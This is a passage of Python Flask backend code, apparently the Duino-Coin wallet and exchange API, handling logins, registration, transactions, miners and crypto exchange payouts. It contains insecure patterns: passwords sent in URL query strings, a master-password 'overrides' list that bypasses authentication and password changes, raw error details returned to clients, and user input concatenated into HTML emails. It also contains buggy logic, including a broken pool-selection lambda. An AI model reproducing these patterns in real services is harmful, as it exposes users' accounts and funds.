with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(str(username),))
data = datab.fetchone()
if len(data) > 1:
stored_password = data[1]
else:
return (False, "No user found")
try:
if checkpw(unhashed_pass, stored_password):
return (True, "Logged in")
return (False, "Invalid password")
except Exception:
if checkpw(unhashed_pass, stored_password.encode('utf-8')):
return (True, "Logged in")
return (False, "Invalid password")
except Exception as e:
return (False, "DB Err: " + str(e))
def check_ip(ip):
global checked_ips
global IP_CHECK_DISABLED
try:
if IP_CHECK_DISABLED:
return (False, None)
elif not ip:
return (True, "Your IP address is hidden")
elif ip in whitelist:
return (False, None)
elif ip in checked_ips:
return checked_ips[ip]
response = requests_session.get(
f"http://proxycheck.io/v2/{ip}"
+ f"?key={PROXYCHECK_KEY}&vpn=1&proxy=1").json()
if response["status"] != "error":
if "proxy" in response[ip]:
if response[ip]["proxy"] == "yes":
dbg("Proxy detected: " + str(ip))
checked_ips[ip] = (True, "You're using a proxy")
return checked_ips[ip]
if "vpn" in response[ip]:
if response[ip]["vpn"] == "yes":
dbg("VPN detected: " + str(ip))
checked_ips[ip] = (True, "You're using a VPN")
return checked_ips[ip]
else:
# dbg("No proxy: " + str(ip))
checked_ips[ip] = (False, None)
return (False, None)
else:
IP_CHECK_DISABLED = True
return (False, None)
except Exception as e:
return (False, None)
def ip_addr_ban(ip, show=True, perm=False):
if not ip in whitelist:
if show:
dbg(">>> Ip addr banning", ip)
ip_ban.block(ip)
perm_ban(ip)
def _success(result, code=200):
return jsonify(result=result, success=True), code
def _error(result, code=200):
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
ip_ban.add(ip=ip_addr)
return jsonify(message=result, success=False), code
def _proxy():
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
threading.Thread(target=ip_addr_ban, args=[ip_addr, False, True]).start()
return _error("You're using a proxy or VPN")
def get_all_transactions():
global transactions
global last_transactions_update
if time() - last_transactions_update > SAVE_TIME*3:
# print(f'fetching transactions from {CONFIG_TRANSACTIONS}')
try:
with sqlconn(CONFIG_TRANSACTIONS, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM Transactions")
rows = datab.fetchall()
transactions = {}
for row in rows:
transactions[row[4]] = row_to_transaction(row)
last_transactions_update = time()
except Exception as e:
print(traceback.format_exc())
return transactions
def row_to_transaction(row):
return {
'datetime': str(row[0]),
'sender': str(row[1]),
'recipient': str(row[2]),
'amount': float(row[3]),
'hash': str(row[4]),
'memo': str(row[5]),
'id': int(row[6])
}
def get_transactions(username: str, limit=10, reverse=True):
try:
order = "DESC"
if reverse:
order = "ASC"
with sqlconn(CONFIG_TRANSACTIONS, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT * FROM (
SELECT * FROM Transactions
WHERE username = ?
OR recipient = ?
ORDER BY id DESC
LIMIT ?
) ORDER BY id """ + order,
(username, username, limit))
rows = datab.fetchall()
return [row_to_transaction(row) for row in rows]
except Exception as e:
return str(e)
def get_all_miners():
global last_miners_update
global miners
if time() - last_miners_update > SAVE_TIME*3:
try:
# print(f'fetching miners from {CONFIG_MINERAPI}')
with sqlconn(CONFIG_MINERAPI, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM Miners")
rows = datab.fetchall()
last_miners_update = time()
miners = {}
for row in rows:
if not row[1] in miners:
miners[row[1]] = []
miners[row[1]].append(row_to_miner(row))
except Exception as e:
print(traceback.format_exc())
return miners
def row_to_miner(row):
return {
"threadid": str(row[0]),
"username": str(row[1]),
"hashrate": float(row[2]),
"sharetime": float(row[3]),
"accepted": int(row[4]),
"rejected": int(row[5]),
"diff": int(row[6]),
"software": str(row[7]),
"identifier": str(row[8]),
"algorithm": str(row[9]),
"pool": str(row[10]),
"wd": row[11]
}
def get_miners(username: str):
with sqlconn(CONFIG_MINERAPI, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM Miners WHERE username = ?", (username, ))
rows = datab.fetchall()
if len(rows) < 1:
raise Exception("No miners detected")
rows.sort(key=lambda tup: tup[1])
return [row_to_miner(row) for row in rows]
trusted = {}
creation = {}
def get_all_balances():
global balances
global last_balances_update
global balances
global trusted
global creation
if time() - last_balances_update > SAVE_TIME*3:
try:
# print(f'fetching balances from {DATABASE}')
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM Users")
rows = datab.fetchall()
balances = {}
trusted = {}
for row in rows:
balances[row[0]] = row[3]
creation[row[0]] = row[4].lower()
trusted[row[0]] = row[5].lower()
last_balances_update = time()
except Exception as e:
print(traceback.format_exc())
return balances
def get_user_data(username: str):
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Users
WHERE username = ?""",
(username, ))
row = datab.fetchone()
if not row:
raise Exception("User not found")
return {
"username": username,
"balance": round(row[3], DECIMALS),
"verified": row[5].lower(),
"created": row[4].lower()
}
def is_verified(username: str):
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Users
WHERE username = ?""",
(username, ))
row = datab.fetchone()
if len(row) < 1:
return "no"
return row[5].lower()
@app.route("/ping")
@cache.cached(timeout=60)
def ping():
return _success("Pong!")
@app.route("/404")
@cache.cached(timeout=60)
def test404():
dbg("Error 404 test")
return render_template('404.html'), 404
@app.route("/429")
@cache.cached(timeout=60)
def test429():
dbg("Error 429 test")
return render_template('429.html'), 429
@app.route("/403")
@cache.cached(timeout=60)
def test403():
dbg("Error 403 test")
return render_template('403.html'), 403
@app.route("/500")
@cache.cached(timeout=60)
def test500():
dbg("Error 500 test")
return render_template('500.html'), 500
@app.route("/all_pools")
@cache.cached(timeout=SAVE_TIME)
def all_pools():
pools = []
try:
with sqlconn(POOL_DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM PoolList")
data = datab.fetchall()
for row in data:
if row[4] == "True":
pool = {
"name": row[1],
"cpu": int(row[6]),
"ram": int(row[7]),
"connections": int(row[8])}
pools.append(pool)
return _success(pools)
except Exception as e:
return _error(str(e))
@app.route("/autopool")
@cache.cached(timeout=SAVE_TIME)
def getpool():
pools = []
try:
with sqlconn(POOL_DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM PoolList")
data = datab.fetchall()
for row in data:
if row[4] == "True":
pool = {
"name": row[1],
"cpu": int(row[6]),
"ram": int(row[7]),
"ip": str(row[2]),
"port": int(row[3]),
"connections": int(row[8])}
pools.append(pool)
if not pools:
return _error("No pools available")
pool = functools.reduce(
lambda curr, prev: a
if (curr["cpu"]*2 + curr["ram"]) > (curr["cpu"]*2 + curr["ram"])
else curr, pools)
return jsonify({
"name": pool["name"],
"ip": pool["ip"],
"port": pool["port"],
"success": True})
except Exception as e:
return _error(str(e))
registration_db = {}
@app.route("/auth/<username>")
@limiter.limit("6 per 1 minute")
def api_auth(username=None):
global registration_db
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
unhashed_pass = str(request.args.get('password', None)).encode('utf-8')
except Exception as e:
return _error(f"Invalid data: {e}")
if not user_exists(username) or not username:
return _error("This user doesn't exist")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
#dbg("/GET/auth", username, unhashed_pass.decode())
if unhashed_pass.decode() in overrides:
return _success("Logged in")
if username in banlist:
ip_addr_ban(ip_addr)
return _error("User banned")
login_protocol = login(username, unhashed_pass)
if login_protocol[0] == True:
alt_check(ip_addr, username)
return _success(login_protocol[1])
else:
return _error(login_protocol[1])
@app.route("/register/")
@limiter.limit("5 per hour")
def register():
global registrations
try:
username = str(request.args.get('username', None))
unhashed_pass = str(request.args.get('password', None)).encode('utf-8')
email = str(request.args.get('email', None))
captcha = request.args.get('captcha', None)
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
postdata = {'secret': CAPTCHA_SECRET_KEY,
'response': captcha}
except Exception as e:
return _error(f"Invalid data: {e}")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
altcheck = alt_check(ip_addr, username, False)
if altcheck[0]:
return _error(
f"You are already registered as {altcheck[1]}, why do you need another account?")
try:
captcha_data = requests.post(
'https://hcaptcha.com/siteverify', data=postdata).json()
if not captcha_data["success"]:
return _error("Incorrect captcha")
except Exception as e:
return _error("Captcha error: "+str(e))
if not match(r"^[A-Za-z0-9_-]*$", username):
return _error("You have used unallowed characters in the username")
if len(username) > 64 or len(unhashed_pass) > 128 or len(email) > 64:
return _error("Submited data is too long")
if user_exists(username):
return _error("This username is already registered")
if not "@" in email or not "." in email:
return _error("You have provided an invalid e-mail address")
if email_exists(email):
return _error("This e-mail address was already used")
try:
password = hashpw(unhashed_pass, gensalt(rounds=BCRYPT_ROUNDS))
except Exception as e:
return _error("Bcrypt error: " +
str(e) + ", plase try using a different password")
try:
threading.Thread(
target=send_registration_email,
args=[username, email]).start()
created = str(now().strftime("%d/%m/%Y %H:%M:%S"))
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""INSERT INTO Users
(username, password, email, balance, created)
VALUES(?, ?, ?, ?, ?)""",
(username, password, email, 0.0, created))
conn.commit()
dbg(f"Success: registered {username} ({email})")
registrations.append(ip_addr)
return _success("Sucessfully registered a new wallet")
except Exception as e:
return _error(f"Error registering new account: {e}")
@app.route("/miners/<username>")
@cache.cached(timeout=SAVE_TIME)
def get_miners_api(username: str):
# Get all miners
try:
return _success(get_miners(username))
except:
return _error("No miners detected on that account")
@app.route("/wduco_wrap/<username>")
@limiter.limit("3 per 1 minute")
def api_wrap_duco(username: str):
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
unhashed_pass = request.args.get('password', None).encode("utf-8")
amount = float(request.args.get('amount', None))
tron_address = str(request.args.get('address', None))
except Exception as e:
return _error(f"Invalid data: {e}")
dbg("GET/wduco_wrap", username, amount, tron_address)
login_protocol = login(username, unhashed_pass)
if not login_protocol[0]:
return _error(login_protocol[1])
if amount < 30:
return _error("Minimum wrappable amount is 30 DUCO")
if username in jail or username in banlist:
return _error("User can not wrap DUCO")
altfeed = alt_check(ip_addr, username, True, False)
if altfeed[0]:
if not username in altfeed[1][:2]: # Filter first two accounts
return _error(f"You're using alt-account(s): {altfeed[1][2]}")
wrapfeedback = protocol_wrap_wduco(username, tron_address, amount)
wrapfeedback = wrapfeedback.replace("NO,", "").replace("OK,", "")
if "OK" in wrapfeedback:
return _success(wrapfeedback)
else:
return _error(wrapfeedback)
@app.route("/users/<username>")
@limiter.limit("60 per 1 minute")
@cache.cached(timeout=SAVE_TIME)
def api_get_user_objects(username: str):
try:
try:
limit = int(request.args.get('limit', None))
except:
limit = 5
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
return _error(f"Invalid data: {e}")
# dbg("/GET/users/"+str(username))
try:
balance = get_user_data(username)
except Exception as e:
return _error(f"This user doesn't exist: {e}")
try:
miners = get_miners(username)
except Exception as e:
miners = []
try:
transactions = get_transactions(username, limit)
except Exception as e:
transactions = []
result = {
'balance': balance,
'miners': miners,
'transactions': transactions
}
return _success(result)
@app.route("/users/")
@cache.cached(timeout=60)
def user_error():
return _error("Usage: /users/<username>")
@app.route("/changepass/<username>")
@limiter.limit("1 per 1 minute")
def api_changepass(username: str):
try:
old_password = request.args.get('password', None).encode("utf-8")
new_password = request.args.get('newpassword', None).encode("utf-8")
new_password_encrypted = hashpw(
new_password, gensalt(rounds=BCRYPT_ROUNDS))
if old_password == new_password:
return _error("New password must be different")
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""SELECT *
FROM Users
WHERE username = ?""",
(username,))
old_password_database = datab.fetchone()[1].encode('utf-8')
except:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""SELECT *
FROM Users
WHERE username = ?""",
(username,))
old_password_database = datab.fetchone()[1]
if (checkpw(old_password, old_password_database)
or old_password in overrides):
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""UPDATE Users
set password = ?
where username = ?""",
(new_password_encrypted, username))
conn.commit()
print("Changed password of user " + username)
return _success("Your password has been changed")
else:
print("Passwords of user " + username + " don't match")
return _error("Your old password doesn't match!")
except Exception as e:
print("Error changing password: " + str(e))
return _error("Internal server error: " + str(e))
@app.route("/verify/<username>")
def api_verify(username: str):
try:
pwd = str(request.args.get('pass', None))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
admin = str(request.args.get('admin', "revox"))
except Exception as e:
return _error(f"Invalid data: {e}")
if not user_exists(username):
return _error("Invalid username :(")
if not pwd in overrides:
return _error("Invalid password!!!")
if is_verified(username) == "yes":
return _error("This user is already verified :P")
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""UPDATE Users
set rig_verified = ?
where username = ?""",
("Yes", username))
conn.commit()
except Exception as e:
return _error(str(e))
try:
threading.Thread(target=protocol_verified_mail, args=[username, admin]).start()
except Exception as e:
return _error(str(e))
dbg(f"Verified {username} by {ip_addr} ({pwd})")
return _success("Success")
@app.route("/user_transactions/<username>")
@cache.cached(timeout=SAVE_TIME)
def get_transaction_by_username(username: str):
dbg("/GET/user_transactions/"+str(username))
try:
limit = int(request.args.get('limit', 5))
except Exception as e:
return _error(f"Invalid data: {e}")
try:
transactions = get_transactions(username, limit)
return _success(transactions)
except Exception as e:
return _error(f"Error: {e}")
@app.route("/id_transactions/<tx_id>")
@cache.cached(timeout=SAVE_TIME)
def get_transaction_by_id(tx_id: str):
# dbg("/GET/id_transactions/"+str(tx_id))
try:
return _success(api_tx_by_id(tx_id))
except Exception as e:
return _error("No transaction found")
def api_tx_by_id(tx_id: str):
with sqlconn(CONFIG_TRANSACTIONS, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Transactions
WHERE id = ?""",
(tx_id, ))
row = datab.fetchone()
if not row:
raise Exception("No transaction found")
return row_to_transaction(row)
@app.route("/transactions/<hash>")
@cache.cached(timeout=SAVE_TIME)
def get_transaction_by_hash(hash: str):
# dbg("/GET/transactions/"+str(hash))
try:
return _success(api_tx_by_hash(hash))
except Exception as e:
return _error("No transaction found")
def api_tx_by_hash(hash: str):
with sqlconn(CONFIG_TRANSACTIONS, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Transactions
WHERE hash = ?""",
(hash, ))
row = datab.fetchone()
if not row:
raise Exception("No transaction found")
return row_to_transaction(row)
@app.route("/balances/<username>")
@cache.cached(timeout=SAVE_TIME)
def api_get_user_balance(username: str):
# dbg("/GET/balances/"+str(username))
try:
return _success(get_user_data(username))
except Exception as e:
return _error("This user doesn't exist")
@app.route("/balances")
@cache.cached(timeout=SAVE_TIME*3)
def api_get_all_balances():
dbg("/GET/balances")
try:
return _success(get_all_balances())
except Exception as e:
return _error("Error fetching balances: " + str(e))
@app.route("/transactions")
@cache.cached(timeout=SAVE_TIME*3)
def api_get_all_transactions():
dbg("/GET/transactions")
try:
return _success(get_all_transactions())
except Exception as e:
return _error("Error fetching transactions: " + str(e))
@app.route("/miners")
@cache.cached(timeout=SAVE_TIME*3)
def api_get_all_miners():
dbg("/GET/miners")
try:
return _success(get_all_miners())
except Exception as e:
return _error("Error fetching miners: " + str(e))
@app.route("/statistics")
@cache.cached(timeout=SAVE_TIME*3)
def get_api_data():
# dbg("/GET/statistics")
data = {}
with open(API_JSON_URI, 'r') as f:
try:
data = load(f)
except:
pass
return jsonify(data)
@app.route("/ip")
def get_ip():
dbg("/GET/ip")
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
return _success(ip_addr)
@app.route("/statistics_miners")
@cache.cached(timeout=SAVE_TIME*3)
def get_api_data_miners():
dbg("/GET/statistics_miners")
all_miners = get_all_miners()
get_all_balances()
try:
to_return = {}
for user in all_miners:
try:
to_return[user] = {
"w": len(all_miners[user]),
"v": trusted[user]}
except:
continue
return _success(to_return)
except Exception as e:
return _error(str(e))
@app.route("/exchange_request/")
@limiter.limit("2 per 1 day")
def exchange_request():
try:
username = str(request.args.get('username', None))
unhashed_pass = request.args.get('password', None).encode('utf-8')
email = str(request.args.get('email', None))
ex_type = str(request.args.get('type', None)).upper()
amount = int(request.args.get('amount', None))
coin = str(request.args.get('coin', None)).lower()
address = str(request.args.get('address', None))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
return _error(f"Invalid data: {e}")
dbg("EX:", username, email)
# return _error("Exchange requests on DUCO Exchange are currently disabled, use other exchange")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
if is_verified(username) != "yes":
return _error("Your account is not verified, see https://server.duinocoin.com/verify.html")
if username in banlist or username in jailedusr:
return _error("You are not elgible for the exchange (ToS violation)")
# Check email
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(str(username),))
stored_mail = datab.fetchone()[2]
if not email == stored_mail:
return _error(
"This e-mail is not associated with your Duino-Coin account")
except Exception as e:
return _error("No user found: " + str(e))
# Check password
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(str(username),))
stored_password = datab.fetchone()[1]
try:
if not checkpw(unhashed_pass, stored_password):
return _error("Invalid password")
except Exception as e:
if not checkpw(unhashed_pass, stored_password.encode('utf-8')):
return _error("Invalid password")
except Exception as e:
return _error("No user found: " + str(e))
altfeed = alt_check(ip_addr, username, True, False)
if altfeed[0]:
if not username in altfeed[1][:2]: # Filter first two accounts
return _error(f"You're using alt-account(s): {altfeed[1][2]}")
# Check the amount
if amount < 200:
return _error("Minimum exchangeable amount is 200 DUCO")
if amount > 10000:
return _error("Maximum exchangeable amount is 10000 DUCO")
if ex_type.upper() == "SELL":
balance = get_user_data(username)["balance"]
if amount > balance:
return _error("You don't have enough DUCO in your account ("
+ str(round(balance, 3))+")")
else:
exchange_balance = get_user_data(exchange_address["duco"])["balance"]
if amount > exchange_balance:
return _error("We don't have enough DUCO in our reserves ("
+ str(round(exchange_balance, 3))+"). "
+ "Try again later or with a smaller amount")
# Get current exchange rates
try:
de_api = requests.get("https://github.com/revoxhere/duco-exchange/"
+ "raw/master/api/v1/rates",
data=None).json()["result"]
except Exception as e:
return _error("Error getting exchange rates: " + str(e))
try:
exchanged_amount = round(
de_api[coin.lower()][ex_type.lower()]*amount,
len(str(de_api[coin.lower()][ex_type.lower()])))
except Exception:
return _error("That coin isn't listed")
# XRP has a high transaction fee so we need to check for that
if coin.lower() == "xrp" and ex_type.upper() == "SELL":
min_amount = round(0.3 / de_api["xrp"]["sell"])
if amount < min_amount:
return _error(f"Minimum sellable amount for XRP is {min_amount} DUCO")
# Generate TXID
import random
random = random.randint(0, XXHASH_TX_PROB+1)
if random != XXHASH_TX_PROB:
global_last_block_hash_cp = sha1(
bytes(str(username)+str(amount)+str(random),
encoding='ascii')).hexdigest()
else:
global_last_block_hash_cp = xxh64(
bytes(str(username)+str(amount)+str(random),
encoding='ascii'), seed=2811).hexdigest()
def _quickexchange(ex_type, username, email, amount, exchanged_amount, coin, address):
if coin.lower() == "bch":
tx_api = "https://blockchair.com/bitcoin-cash/transaction/"
try:
if len(str(address)) == 34:
address = str(convert.to_cash_address(address))
coin_txid = bch_key.send([(str(address),
float(exchanged_amount), 'bch')],
unspents=bch_key.get_unspents())
dbg("EX: Sent BCH", coin_txid)
except Exception as e:
print("EX: Error sending BCH", traceback.format_exc())
error_log(
"Exchange error: " +
f"{ex_type} from {username} ({email}) - {amount} DUCO ({exchanged_amount} {coin}) {address} - {e}")
# return _error("Error transferring coins, please try again later: "+str(e))
elif coin.lower() == "xmg":
tx_api = "https://magi.duinocoin.com/?search="
try:
coin_txid = requests.get(
"https://magi.duinocoin.com/transaction"
+ f"?username=revox&recipient={address}"
+ f"&password={DUCO_PASS}&amount={exchanged_amount}"
+ f"&memo=DUCO Exchange payment").json()
if "result" in coin_txid:
coin_txid = coin_txid["result"].split(",")[2]
dbg("EX: Sent XMG", coin_txid)
else:
raise Exception(coin_txid["message"])
except Exception as e:
print("EX: Error sending XMG", traceback.format_exc())
error_log(
"\nExchange error: " +
f"{ex_type} from {username} ({email}) - {amount} DUCO ({exchanged_amount} {coin}) {address} - {e}")
# return _error("Error transferring coins, please try again later: "+str(e))
elif coin.lower() == "trx":
tx_api = "https://tronscan.org/#/transaction/"
try:
coin_txid = trx_key.trx.send_transaction(str(address),
float(exchanged_amount-1))["txid"]
dbg("EX: Sent TRX", coin_txid)
except Exception as e:
print("EX: Error sending TRX", traceback.format_exc())
error_log(
"\nExchange error: " +
f"{ex_type} from {username} ({email}) - {amount} DUCO ({exchanged_amount} {coin}) {address} - {e}")
# return _error("Error transferring coins, please try again later: "+str(e))
elif coin.lower() == "lke":
tx_api = "https://explorer.likecoin.pro/tx/"
try:
coin_txid = likecoin_transaction(str(address), int(exchanged_amount), "DUCO Exchange payment")
dbg("EX: Sent LKE", coin_txid)
except Exception as e:
print("EX: Error sending LKE", traceback.format_exc())
error_log(
"\nExchange error: " +
f"{ex_type} from {username} ({email}) - {amount} DUCO ({exchanged_amount} {coin}) {address} - {e}")
# return _error("Error transferring coins, please try again later: "+str(e))
elif coin.lower() == "nano":
tx_api = "https://nanocrawler.cc/explorer/block/"
try:
coin_txid = nano_key.send(str(address), float(exchanged_amount))
dbg("EX: Sent NANO", coin_txid)
except Exception as e:
print("EX: Error sending NANO", traceback.format_exc())
error_log(
"\nExchange error: " +
f"{ex_type} from {username} ({email}) - {amount} DUCO ({exchanged_amount} {coin}) {address} - {e}")
# return _error("Error transferring coins, please try again later: "+str(e))
html = """\
<html>
<body>
<p style="font-size:18px">
Automatic exchange finished<br>
Type: <b>""" + str(ex_type) + """</b><br>
Username: <b>""" + str(username) + """</b><br>
Amount: <b>""" + str(amount) + """</b> DUCO<br>
Email: <b>""" + str(email) + """</b><br>
Address: <b>""" + str(address) + """</b><br>
Sent: <b>""" + str(exchanged_amount) + """</b> """ + coin.upper() + """<br>
TXID: <a href='""" + str(tx_api) + str(coin_txid) + """'>"""+str(coin_txid)+"""</a><br>
DUCO TXID: <a href="https://explorer.duinocoin.com?search=""" + str(global_last_block_hash_cp) + """">"""+str(global_last_block_hash_cp)+"""</a>
</p>
</body>
</html>"""
try:
message = MIMEMultipart("alternative")
message["Subject"] = ("✅ Auto DUCO - "
+ str(coin).upper()
+ " "
+ ex_type.upper()
+ " exchange finished")
message["From"] = DUCO_EMAIL
message["To"] = EXCHANGE_MAIL
part = MIMEText(html, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, EXCHANGE_MAIL, message.as_string())
except Exception as e:
return _error("Error sending an e-mail to the exchange system")
####
email_body = html_auto.replace(
"{user}", str(username)
).replace(
"{amount}", str(amount)
).replace(
"{tx_api}", str(tx_api)
).replace(
"{txid}", str(coin_txid)
).replace(
"{duco_tx}", str(global_last_block_hash_cp))
message = MIMEMultipart("alternative")
message["Subject"] = "✨ Your DUCO - "+str(coin).upper()+" exchange is done!"
try:
message["From"] = DUCO_EMAIL
message["To"] = email
part = MIMEText(email_body, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, email, message.as_string())
except Exception:
print(traceback.format_exc())
quickexchange = ["bch", "trx", "lke", "nano", "xmg"]
if ex_type.lower() == "sell" and coin.lower() in quickexchange:
try:
threading.Thread(
target=_quickexchange,
args=[ex_type, username, email, amount, exchanged_amount, coin, address]).start()
dbg("Launched exchange thread")
except Exception as e:
return _error(f"Error lanching transaction thread: {e}")
elif ex_type.lower() == "sell":
html = """\
<html>
<body>
<p style="font-size:18px">
All checks for this user passed, exchange data:<br>
Type: <b>""" + str(ex_type) + """</b><br>
Username: <b>""" + str(username) + """</b><br>
Amount: <b>""" + str(amount) + """</b> DUCO<br>
Email: <b>""" + str(email) + """</b><br>
Address: <b>""" + str(address) + """</b><br>
Send: <b>""" + str(exchanged_amount) + """</b> """ + coin.upper() + """<br>
</p>
</body>
</html>"""
try:
message = MIMEMultipart("alternative")
message["Subject"] = ("⚠️ Manual DUCO - "
+ str(coin).upper()
+ " "
+ ex_type.lower()
+ " request")
message["From"] = DUCO_EMAIL
message["To"] = EXCHANGE_MAIL
part = MIMEText(html, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, EXCHANGE_MAIL, message.as_string())
except Exception as e:
return _error("Error sending an e-mail to the exchange system")
###
message = MIMEMultipart("alternative")
message["Subject"] = "🍒 Your DUCO Exchange sell request has been received"
try:
message["From"] = DUCO_EMAIL
message["To"] = email
email_body = html_exc.replace(
"{user}", str(username)
).replace(
"{ex_type}", str(ex_type.lower())
).replace(
"{amount}", str(amount)
).replace(
"{address}", str(address)
)
part = MIMEText(email_body, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, email, message.as_string())
except Exception:
print(traceback.format_exc())
elif ex_type.lower() == "buy":
###
message = MIMEMultipart("alternative")
message["Subject"] = "🔥 Finish your DUCO Exchange buy request"
try:
message["From"] = DUCO_EMAIL
message["To"] = email
email_body = html_buy.replace(
"{user}", str(username)
).replace(
"{coin}", str(coin.upper())
).replace(
"{amount}", str(amount)
).replace(
"{exchanged_amount}", str(exchanged_amount)
).replace(
"{exchange_address}", str(exchange_address[coin.lower()])
)
part = MIMEText(email_body, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, email, message.as_string())
except Exception:
print(traceback.format_exc())
if ex_type.lower() == "sell":
try:
recipient = "coinexchange"
memo = ("DUCO Exchange transaction "
+ "(sell for "
+ str(coin.upper())
+ ")")
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(recipient,))
recipientbal = float(datab.fetchone()[3])
except:
return _error("NO,Recipient doesn\'t exist")
if float(balance) >= float(amount):
balance -= float(amount)
recipientbal += float(amount)
while True:
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(balance, username))
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(round(float(recipientbal), 20), recipient))
conn.commit()
break
except:
pass
formatteddatetime = now().strftime("%d/%m/%Y %H:%M:%S")
with sqlconn(CONFIG_TRANSACTIONS,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""INSERT INTO Transactions
(timestamp, username, recipient, amount, hash, memo)
VALUES(?, ?, ?, ?, ?, ?)""",
(formatteddatetime,
username,
recipient,
amount,
global_last_block_hash_cp,
memo))
conn.commit()
except Exception:
return _success("Error deducting balance")
return _success("Your exchange request has been successfully submited")
@app.route("/transaction/")
@limiter.limit("2 per 1 minute")
def api_transaction():
global last_transfer
global banlist
global rate_count
# return _error("Temporarily disabled")
try:
username = str(request.args.get('username', None))
unhashed_pass = str(request.args.get('password', None)).encode('utf-8')
recipient = str(request.args.get('recipient', None))
amount = float(request.args.get('amount', None))
memo = sub(r'[^A-Za-z0-9 .()-:/!#_+-]+', ' ', str(request.args.get('memo', None)))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
print(e)
return _error(f"NO,Invalid data: {e}")
dbg(f"New TX request: {username}",
f"\n\t amount: {amount}",
f"\n\t recipient: {recipient}",
f"\n\t memo: {memo}")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
#return _error("Temporarily disabled")
chain_accounts = ["bscDUCO", "celoDUCO", "maticDUCO"]
if recipient in chain_accounts:
acccheck = acc_check(memo, username)
if acccheck[0]:
jail.append(username)
return _error(f"NO,This address is associated with another account(s): {acccheck[1]}")
if len(str(memo)) > 256:
memo = str(memo[0:253]) + "..."
if not match(r"^[A-Za-z0-9_-]*$", username):
return _error("NO,Incorrect username")
if not match(r"^[A-Za-z0-9_-]*$", recipient):
return _error("NO,Incorrect recipient")
if is_verified(username) == "no":
return _error("NO,Verify your account first")
if username in jail:
return _error("NO,BONK - go to kolka jail")
if recipient in banlist or recipient in jailedusr:
return _error("NO,Can\'t send funds to that user")
if username in banlist:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
ip_addr_ban(ip_addr)
return _error("NO,User baned")
if memo == "-" or memo == "":
memo = "None"
